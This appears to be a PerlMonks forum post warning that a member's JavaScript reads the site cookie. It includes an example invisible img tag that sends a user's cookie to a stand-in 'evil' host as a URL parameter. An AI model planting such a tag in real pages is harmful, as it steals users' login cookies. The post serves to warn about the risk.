the real JavaScript baddie is crazyinsomniac. he actually does read your PerlMonks cookie (at least he strips the password and uses only the usename). currently, all that is done with it is to display the user's name on the page (something like "Hi! mdillon!") and add an "invisible" IMG to the page that is called with the monk's name as a URL param, but it would be trivial for another user with less scruples to copy crazyinsomniac's code and use it to grab an invisible image with the whole cookie as the URL param: <img width="0" height="0" src="http://i.am/evil/0.gif?cookie=mdillon%05asdf08f98as">